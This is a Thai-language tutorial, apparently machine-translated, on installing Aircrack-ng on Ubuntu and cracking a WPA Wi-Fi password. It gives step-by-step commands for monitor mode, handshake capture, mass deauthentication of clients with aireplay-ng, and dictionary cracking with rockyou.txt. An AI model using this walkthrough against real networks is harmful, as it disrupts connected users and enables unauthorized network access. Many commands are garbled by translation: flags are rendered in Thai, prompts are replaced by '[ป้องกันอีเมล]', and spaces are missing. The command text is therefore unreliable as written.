ติดตั้ง Aircrack บน Ubuntu

Install Aircrack Ng Ubuntu



Aircrack-ng เป็นชุดเครื่องมือทั้งหมดสำหรับการตรวจสอบความปลอดภัยแบบไร้สาย สามารถใช้เพื่อตรวจสอบ ทดสอบ ถอดรหัส หรือโจมตี Wireless Security Protocols เช่น WEP, WPA, WPA2 Aircrack-ng เป็นบรรทัดคำสั่งและพร้อมใช้งานสำหรับ Windows และ Mac OS และระบบปฏิบัติการอื่น ๆ ที่ใช้ Unix ชุด Aircrack-ng มีเครื่องมือมากมายที่ใช้เพื่อวัตถุประสงค์ต่างๆ แต่ที่นี่เราจะดูเฉพาะเครื่องมือสำคัญบางอย่างที่ใช้บ่อยกว่าในการทดสอบความปลอดภัยไร้สาย

แอร์ม่อนง







Airmon-ng ใช้เพื่อจัดการโหมดการ์ดไร้สายและเพื่อฆ่ากระบวนการที่ไม่จำเป็นในขณะที่ใช้ aircrack-ng ในการดมกลิ่นการเชื่อมต่อไร้สาย คุณต้องเปลี่ยนการ์ดไร้สายของคุณจากโหมดที่มีการจัดการเป็นโหมดมอนิเตอร์ และใช้ airmon-ng เพื่อจุดประสงค์นั้น



Airodump-ng



Airodump-ng เป็นเครื่องดมกลิ่นแบบไร้สายที่สามารถบันทึกข้อมูลไร้สายจากจุดเข้าใช้งานแบบไร้สายได้ตั้งแต่หนึ่งจุดขึ้นไป ใช้ในการวิเคราะห์จุดเชื่อมต่อที่อยู่ใกล้เคียงและเพื่อจับมือกัน





Aireplay-ng

Aireplay-ng ใช้สำหรับการโจมตีซ้ำและเป็นหัวฉีดแพ็คเก็ต สามารถยกเลิกการรับรองความถูกต้องของผู้ใช้จาก AP เพื่อจับภาพการจับมือได้



Airdecap-ng

Airdecap-ng ใช้เพื่อถอดรหัสแพ็กเก็ตไร้สาย WEP, WPA/WPA2 ที่เข้ารหัสด้วยคีย์ที่รู้จัก

Aircrack-ng

Aircrack-ng ใช้เพื่อโจมตีโปรโตคอลไร้สาย WPA/WEP เพื่อค้นหาคีย์

Aircrack-ng ติดตั้งง่ายใน Ubuntu โดยใช้ APT เพียงพิมพ์คำสั่งต่อไปนี้ การดำเนินการนี้จะติดตั้งเครื่องมือทั้งหมดที่มีอยู่ในชุด Aircrack-ng

sudo apt-get update
sudo apt-get install -และaircrack-ng

การใช้งาน

ในบทความนี้ เราจะมาดูวิธีใช้ aircrack-ng เพื่อถอดรหัสเครือข่ายไร้สายที่เข้ารหัส (TR1CKST3R ในตัวอย่างนี้) เพื่อค้นหารหัสผ่าน

ก่อนอื่น แสดงรายการการ์ดไร้สายทั้งหมดที่เชื่อมต่อกับพีซีของคุณโดยใช้คำสั่ง 'iwconfig'

เราจะใช้การ์ดไร้สายที่มีชื่อ 'wlxc83a35cb4546' สำหรับบทช่วยสอนนี้ (ซึ่งอาจแตกต่างออกไปในกรณีของคุณ) ตอนนี้ ฆ่ากระบวนการทั้งหมดที่ทำงานบนการ์ดไร้สายโดยใช้ airmon-ng

[ป้องกันอีเมล] :~$sudoแอร์ม่อน เช็คฆ่า
เริ่มโหมดมอนิเตอร์บน 'wlxc83a35cb4546' โดยพิมพ์
[ป้องกันอีเมล] :~$sudoairmon-ng เริ่ม wlxc83a35cb4546

ตอนนี้ airmon-ng ได้เริ่มโหมดมอนิเตอร์บนการ์ดไร้สายแล้ว มันจะปรากฏเป็นชื่ออื่นว่า 'wlan0mon' เรียกใช้ 'iwconfig' อีกครั้งเพื่อแสดงรายการรายละเอียดไร้สาย

จากนั้นใช้ airodump-ng เพื่อดูจุดเชื่อมต่อไร้สายที่อยู่ใกล้เคียงและคุณสมบัติ

[ป้องกันอีเมล] :~$sudoairodump-ng wlan0mon

คุณสามารถจำกัดการค้นหาโดยใช้ตัวกรอง MAC (–bssid) และช่อง (-c) ในการจับภาพการจับมือกัน (การจับมือกันมีรหัสผ่านที่เข้ารหัส) เราจำเป็นต้องบันทึกแพ็คเก็ตของเราไว้ที่ใดที่หนึ่งโดยใช้ตัวเลือก –write พิมพ์,

[ป้องกันอีเมล] :~$sudoairodump-ng--bss6C:B7:49: เอฟซี:62: E4
-ค สิบเอ็ดwlan0mon--เขียน /tmp/จับมือกัน.cap

--bss: ที่อยู่ MAC ของจุดเข้าใช้งาน

-ค: ช่องของ Access Point[1-13]

--เขียน: จัดเก็บแพ็กเก็ตที่ดักจับไว้ที่ตำแหน่งที่กำหนด

ตอนนี้ เราต้องยกเลิกการรับรองความถูกต้องทุกอุปกรณ์จากจุดเข้าใช้งานนี้โดยใช้ยูทิลิตี้ Aireplay-ng เขียน

[ป้องกันอีเมล] :~$sudoaireplay-ng-0 100 -ถึง [MAC_ADD]wlan0mon

-a : ระบุ Access Points MAC สำหรับ Aireplay-ng

-0 : ระบุจำนวน deauth packets ที่จะส่ง

หลังจากนั้นไม่นาน อุปกรณ์ทั้งหมดจะถูกตัดการเชื่อมต่อจากจุดเข้าใช้งานนั้น เมื่อพวกเขาพยายามเชื่อมต่อใหม่ การรัน airodump-ng จะจับภาพการจับมือ จะปรากฏที่ด้านบนของ airodump-ng ที่ทำงานอยู่

Handshake ถูกเก็บไว้ในไดเร็กทอรี '/ tmp/' และมีรหัสผ่านที่เข้ารหัสซึ่งสามารถบังคับแบบออฟไลน์โดยใช้พจนานุกรมได้ ในการถอดรหัสรหัสผ่าน เราจะใช้ Aircrack-ng พิมพ์

[ป้องกันอีเมล] :~$sudoaircrack-ng/tmp/handshake.cap-01.cap-ใน
/usr/แบ่งปัน/รายการคำศัพท์/rockyou.txt
-ใน: ระบุตำแหน่งพจนานุกรม

Aircrack-ng จะผ่านรายการรหัสผ่าน และหากพบ จะแสดงรหัสผ่านที่ใช้เป็นคีย์

ในกรณีนี้ aircrack-ng พบรหัสผ่านที่ใช้ '123456789'

ตอนนี้ หยุดโหมดการตรวจสอบบนการ์ดไร้สายและรีสตาร์ทตัวจัดการเครือข่าย

[ป้องกันอีเมล] :~$sudoairmon-ng หยุด wlan0mon
[ป้องกันอีเมล] :~$sudoตัวจัดการเครือข่ายบริการรีสตาร์ท

บทสรุป

สามารถใช้ Aircrack-ng เพื่อตรวจสอบ Wireless Security หรือถอดรหัสรหัสผ่านที่ลืมได้ มีเครื่องมือที่คล้ายกันอื่น ๆ สำหรับจุดประสงค์นี้ เช่น Kismet แต่ aircrack-ng เป็นที่รู้จักกันดีในด้านการสนับสนุน ความเก่งกาจ และมีเครื่องมือที่หลากหลาย มีอินเทอร์เฟซบรรทัดคำสั่งที่ใช้งานง่าย ซึ่งสามารถทำงานอัตโนมัติได้อย่างง่ายดายโดยใช้ภาษาสคริปต์ใดๆ เช่น Python